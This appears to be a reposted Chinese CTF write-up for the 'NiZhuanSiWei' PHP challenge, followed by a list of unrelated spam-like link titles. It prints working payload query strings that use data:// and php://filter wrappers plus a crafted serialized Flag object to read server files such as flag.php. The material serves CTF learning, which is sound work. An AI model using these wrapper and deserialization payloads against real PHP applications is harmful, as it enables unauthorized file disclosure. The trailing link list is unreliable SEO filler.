当前位置: 首页 > wzjs >正文

石家庄微网站百度收录网站

石家庄微网站,百度收录网站,自己免费怎么制作网站,佛山 网站建设22.NiZhuanSiWei 分析:有三个参数需要以get方式传入,发现有file_get_contents(),所以要使用php伪代码,preg_match("/flag/",$file)说明正则匹配不能含有flag,同时还有反序列化,存在漏洞。 已知前…

22.NiZhuanSiWei

分析:有三个参数需要以get方式传入,发现有file_get_contents(),所以要使用php伪代码,preg_match("/flag/",$file)说明正则匹配不能含有flag,同时还有反序列化,存在漏洞。

已知前两个参数的值,上传

?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php 或者以base64的方式传入text ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

出现base64码,用base64解码器或者wsl解码后得到

<?php  class Flag{  //flag.php  public $file;  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
?>  

存在反序列化操作,我们可以利用该代码修改变量file后添加输出后,进行序列化操作,再传输给password让其输出即可。

VScode中修改:

<?php  class Flag{  //flag.php  public $file="flag.php";  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
$a=new Flag();
echo serialize($a);
?>  

运行获取结果后,传给password

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}  
或者
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}  
其中file第二次不用伪协议

得到flag

http://www.dtcms.com/wzjs/485816.html

相关文章:

  • 上海做网站企业打广告在哪里打最有效
  • 网站开发 如何定位网站关键词优化多少钱
  • 甘肃网站建设宁波网站推广代运营
  • 广州最近什么病毒感染福州专业的seo软件
  • 社交app定制整站优化代理
  • 做网站哪里的服务器速度快深圳网站推广
  • 做公司网站需要几天今日最新国际新闻
  • 阿里云免费空间宁波专业seo服务
  • 女人与马做受网站帮别人推广app赚钱
  • 做网站如何收益zac博客seo
  • 网站建设 哪家好重庆seo网页优化
  • 营销型网站网站bt兔子磁力天堂
  • 网站建设去哪北京seo顾问服务公司
  • 如何做网站ppt网络营销课程个人感悟
  • 学产品设计好找工作吗谷歌seo 优化
  • 做网站和优化品牌营销案例分析
  • 个人备案可以做影视网站吗永久不收费免费的软件
  • 做网站视频 上传到哪儿互联网营销师培训
  • 在线建站|网页制作|网站建设平台网络营销swot分析
  • 怎样 建设电子商务网站整站seo技术
  • ui培训讲师优化设计答案五年级下册
  • 谁家做网站广州最新发布最新
  • 网站开发三层架构排位及资讯
  • 北京电脑培训网站中国职业培训在线
  • 网站快速排名技巧如何建立网站 个人
  • 我想做一个小网站搞页游该怎么做企业网站seo公司
  • 网站建设需要钱吗三叶草gw9356
  • 维护网站费用南京最新消息今天
  • 做网站挂靠服务器什么好发软文的平台
  • 网站建设1app优化推广